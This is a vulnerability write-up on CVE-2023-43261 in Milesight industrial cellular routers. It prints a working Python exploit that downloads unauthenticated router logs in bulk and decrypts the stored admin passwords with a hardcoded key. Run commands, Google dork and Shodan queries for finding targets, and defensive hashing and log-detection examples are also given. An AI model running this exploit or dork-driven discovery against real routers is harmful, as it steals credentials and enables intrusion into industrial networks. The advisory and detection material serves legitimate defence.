CVE-2023-43261: A Critical Milesight Router Vulnerability (PoC)

In today’s rapidly evolving digital landscape, network security is no longer a luxury but a necessity.

As our reliance on technology increases, so does the sophistication of cyber threats.

One such threat is a vulnerability in the network device itself: a flaw in a router can expose stored credentials and hand an attacker a foothold inside the network it is supposed to protect.

In this blog post, we will delve into a critical vulnerability identified as CVE-2023-43261, found in specific models of Milesight Industrial Cellular Routers.

We’ll explore its origins, implications, and how to mitigate its impact.

Overview

A critical security vulnerability, identified as CVE-2023-43261, has been discovered in specific models of Milesight Industrial Cellular Routers.

The affected products include UR5X, UR32L, UR32, UR35, UR41, and potentially other Industrial Cellular Routers.

This vulnerability, published on October 1, 2023, lets an unauthenticated attacker recover the router's administrator and user passwords and, with them, log in to the device.

Understanding the Vulnerability

CVE-2023-43261 stems from two defects. First, the router's web server exposes the /lang/log/ directory (directory listing is enabled) and serves the log files under it, including httpd.log, without any authentication.

Second, those log files record the login requests the web interface receives, including the admin and other user passwords.

The passwords in the log are not plaintext: they are AES-CBC encrypted and base64-encoded. But the 16-byte key and initialization vector (IV) used by the web interface are hardcoded in the JavaScript that every client downloads (the PoC below uses the values '1111111111111111' and '2222222222222222'), so anyone who has the log can decrypt every password in it.

In practice, then, an attacker only needs network access to the router's web interface: fetch the log, decrypt the credentials, and log in as admin.
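The underlying design flaw is that the router stores something reversible: AES under a key shipped to every client is, for practical purposes, no protection at all once the ciphertext leaks. For contrast, the following added example (written for this page, not Milesight's code, using only the Python standard library) shows how a credential store avoids that: each password is turned into a salted, one-way PBKDF2-HMAC-SHA256 hash, so a leaked record cannot be turned back into the password. The iteration count and record format are assumptions chosen for illustration.

```python
import base64
import hashlib
import hmac
import os

# Work factor and salt size are assumptions for this example
# (600k iterations is in line with current PBKDF2-HMAC-SHA256 guidance).
PBKDF2_ITERATIONS = 600_000
SALT_BYTES = 16
ALGORITHM = 'pbkdf2_sha256'


def hash_password(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Derive a one-way, salted hash and pack it as 'pbkdf2_sha256$iter$salt$digest'.

    Unlike AES under a static key, nothing in the stored string (and no
    key anywhere on the device) lets a reader recover the password, so a
    leaked log line or database row does not leak the credential itself.
    """
    if salt is None:
        salt = os.urandom(SALT_BYTES)  # fresh random salt per record
    digest = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, iterations)
    return '%s$%d$%s$%s' % (
        ALGORITHM,
        iterations,
        base64.b64encode(salt).decode('ascii'),
        base64.b64encode(digest).decode('ascii'),
    )


def verify_password(password, stored):
    """Recompute the hash with the stored salt and compare in constant time.

    Malformed records are rejected rather than raising, so a corrupted
    credential store cannot crash the login path.
    """
    try:
        algorithm, iterations, salt_b64, digest_b64 = stored.split('$')
        if algorithm != ALGORITHM:
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(digest_b64)
        iterations = int(iterations)
    except (ValueError, TypeError):
        return False
    candidate = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, iterations)
    return hmac.compare_digest(candidate, expected)


if __name__ == '__main__':
    record = hash_password('admin123')  # constructed sample password
    print('stored record:', record)
    print('correct password accepted:', verify_password('admin123', record))
    print('wrong password rejected:', not verify_password('admin124', record))
    # Two records for the same password differ because the salt differs.
    print('records are unlinkable:', record != hash_password('admin123'))
```

Note that the same principle applies to the log file: a login handler should never write the submitted password (encrypted or not) to a log in the first place, and the hash above is for the credential store, not for logging.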

How to Utilize the CVE-2023-43261 PoC Script

To test for this vulnerability during an authorized penetration test, you can use the provided Python script:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

"""
Title: Credential Leakage Through Unprotected System Logs and Weak Password Encryption
CVE: CVE-2023-43261
Script Author: Bipin Jitiya (@win3zz)
Vendor: Milesight IoT - https://www.milesight-iot.com/ (Formerly Xiamen Ursalink Technology Co., Ltd.)
Software/Hardware: UR5X, UR32L, UR32, UR35, UR41; other Milesight Industrial Cellular Routers may also be vulnerable.
Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10
Writeup: https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf
"""

import sys
import requests
import re
import warnings
from Crypto.Cipher import AES # pip install pycryptodome
from Crypto.Util.Padding import unpad
import base64
import time

warnings.filterwarnings("ignore")

# AES-128-CBC key and IV hardcoded in the router's web-interface JavaScript;
# every client receives them, so the "encrypted" passwords in the log are recoverable.
KEY = b'1111111111111111'
IV = b'2222222222222222'

def decrypt_password(password):
    """Base64-decode a password from httpd.log and decrypt it with the static key/IV.

    Returns None (after printing the error) when the value is not valid
    base64/AES-CBC data, e.g. a truncated log entry.
    """
    try:
        return unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(password)), AES.block_size).decode('utf-8')
    except ValueError as e:
        display_output('      [-] Error occurred during password decryption: ' + str(e), 'red')

def display_output(message, color):
    colors = {'red': '\033[91m', 'green': '\033[92m', 'blue': '\033[94m', 'yellow': '\033[93m', 'cyan': '\033[96m', 'end': '\033[0m'}
    print(f"{colors[color]}{message}{colors['end']}")
    time.sleep(0.5)

urls = []

if len(sys.argv) == 2:
    urls.append(sys.argv[1])

if len(sys.argv) == 3 and sys.argv[1] == '-f':
    with open(sys.argv[2], 'r') as file:
        urls.extend(file.read().splitlines())

if len(urls) == 0:
    display_output('Please provide a URL or a file with a list of URLs.', 'red')
    display_output('Example: python3 ' + sys.argv[0] + ' https://example.com', 'blue')
    display_output('Example: python3 ' + sys.argv[0] + ' -f urls.txt', 'blue')
    sys.exit()

use_proxy = False
# Route both schemes through an intercepting proxy (e.g. Burp on 127.0.0.1:8080) when enabled
proxies = {'http': 'http://127.0.0.1:8080/', 'https': 'http://127.0.0.1:8080/'} if use_proxy else None

for url in urls:
    display_output('[*] Initiating data retrieval for: ' + url + '/lang/log/httpd.log', 'blue')
    try:
        # Vulnerable firmware serves the log without authentication; self-signed certs are common, hence verify=False
        response = requests.get(url + '/lang/log/httpd.log', proxies=proxies, verify=False, timeout=15)
    except requests.exceptions.RequestException as e:
        # Keep going with the next host instead of aborting the whole list
        display_output('[-] Request failed for ' + url + ': ' + str(e), 'red')
        continue

    if response.status_code == 200:
        display_output('[+] Data retrieval successful for: ' + url + '/lang/log/httpd.log', 'green')
        data = response.text
        credentials = set(re.findall(r'"username":"(.*?)","password":"(.*?)"', data))

        num_credentials = len(credentials)
        display_output(f'[+] Found {num_credentials} unique credentials for: ' + url, 'green')

        if num_credentials > 0:
            display_output('[+] Login page: ' + url + '/login.html', 'green')
            display_output('[*] Extracting and decrypting credentials for: ' + url, 'blue')
            display_output('[+] Unique Credentials:', 'yellow')
            for i, (username, password) in enumerate(credentials, start=1):
                display_output(f'    Credential {i}:', 'cyan')
                decrypted_password = decrypt_password(password.encode('utf-8'))
                display_output(f'      - Username: {username}', 'green')
                display_output(f'      - Password: {decrypted_password}', 'green')
        else:
            display_output('[-] No credentials found in the retrieved data for: ' + url, 'red')
    else:
        display_output('[-] Data retrieval failed. Please check the URL: ' + url, 'red')

Here’s how to run it:

Pass the target router’s base URL (scheme and host only, no trailing path) as the single argument:

root@kali:~$ python3 CVE-2023-43261.py https://example.com

If you need to process a list of URLs from a file (one base URL per line), use the following command:

root@kali:~$ python3 CVE-2023-43261.py -f list_urls.txt

Google Dorks and Shodan Search Query

Google Dorks and Shodan search queries can also be used to find potential targets.

Here are some search strings that can be used:

For Google Dorks:

"/lang/log/system" ext:log

"URSALINK" "English" "Login"

For Shodan Search Query:

http.html:rt_title

Conclusion

CVE-2023-43261 in Milesight routers is a reminder that the devices at the network edge deserve the same scrutiny as the hosts behind them: here, an unauthenticated log file and a key shipped to every browser were enough to hand over the admin password.

Understanding how the flaw works is what makes the mitigation concrete: patch the firmware, and treat any credential that may have appeared in the exposed log as compromised.

If you’re using any of the affected Milesight routers, ensure that you’ve updated to the latest firmware (v35.3.0.7 or later) to mitigate this vulnerability.
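Patching does not tell you whether the log was already read. The following added example (written for this page, not part of the original post or of any Milesight tooling) shows the detection logic a defender would run over web-server or reverse-proxy access logs in front of such a router: it flags every request under /lang/log/, distinguishes successful reads (status 200, i.e. the file was exposed) from probes against a patched device, and normalizes URL-encoded or non-canonical paths so a request for /lang/%6Cog/httpd.log is not missed. The log lines are constructed samples in Common Log Format; the IP addresses are documentation ranges, not real hosts.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample access log (Common Log Format); not from any real device.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [01/Oct/2023:10:14:02 +0000] "GET /login.html HTTP/1.1" 200 5120
203.0.113.7 - - [01/Oct/2023:10:14:05 +0000] "GET /lang/log/ HTTP/1.1" 200 812
203.0.113.7 - - [01/Oct/2023:10:14:06 +0000] "GET /lang/log/httpd.log HTTP/1.1" 200 48211
198.51.100.23 - - [01/Oct/2023:11:02:41 +0000] "GET /lang/%6Cog/httpd.log?x=1 HTTP/1.1" 200 48211
198.51.100.23 - - [01/Oct/2023:11:05:09 +0000] "GET /lang/log/httpd.log HTTP/1.1" 404 152
192.0.2.10 - - [01/Oct/2023:11:30:00 +0000] "POST /cgi HTTP/1.1" 200 77
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# The directory whose listing and contents (httpd.log, system log) should never
# be reachable without authentication on these routers.
SENSITIVE_DIR = '/lang/log'


def parse_line(line):
    """Parse one CLF line into a dict, or return None for lines that do not match."""
    m = LOG_LINE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    return rec


def normalize_path(path):
    """Strip the query string, percent-decode, and collapse '..' and '//' so that
    encoded or non-canonical spellings of the log path still match."""
    path = path.split('?', 1)[0]
    return posixpath.normpath(unquote(path))


def is_sensitive(path):
    norm = normalize_path(path)
    return norm == SENSITIVE_DIR or norm.startswith(SENSITIVE_DIR + '/')


def find_log_access(access_log):
    """Return one finding per request under /lang/log/, in log order.

    severity 'exposed' means the server answered 200, i.e. the listing or log
    file was actually served; 'probe' means the request was made but refused,
    which is what a patched or firewalled device should show.
    """
    findings = []
    for line in access_log.splitlines():
        rec = parse_line(line)
        if rec is None or not is_sensitive(rec['path']):
            continue
        findings.append({
            'ip': rec['ip'],
            'ts': rec['ts'],
            'path': normalize_path(rec['path']),
            'status': rec['status'],
            'severity': 'exposed' if rec['status'] == 200 else 'probe',
        })
    return findings


def hosts_with_exposure(findings):
    """Client IPs that successfully read something under /lang/log/."""
    return {f['ip'] for f in findings if f['severity'] == 'exposed'}


if __name__ == '__main__':
    results = find_log_access(SAMPLE_ACCESS_LOG)
    for f in results:
        print('%-8s %-15s %s %s %d' % (f['severity'], f['ip'], f['ts'], f['path'], f['status']))
    print('hosts that obtained the log:', sorted(hosts_with_exposure(results)))
```

Any 'exposed' hit means the credentials in that log must be considered stolen regardless of whether the firmware has since been updated; rotate the admin and user passwords and review the router's configuration for changes made with them. The check relies on the router (or a proxy in front of it) having kept access logs for the relevant period, which is another reason to ship device logs off-box.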

The vulnerability carries a CVSS severity score of 7.3 out of 10 (High). If you run any of the affected products, apply the firmware update now and, because the log may already have been read, change the router’s admin and user passwords afterwards.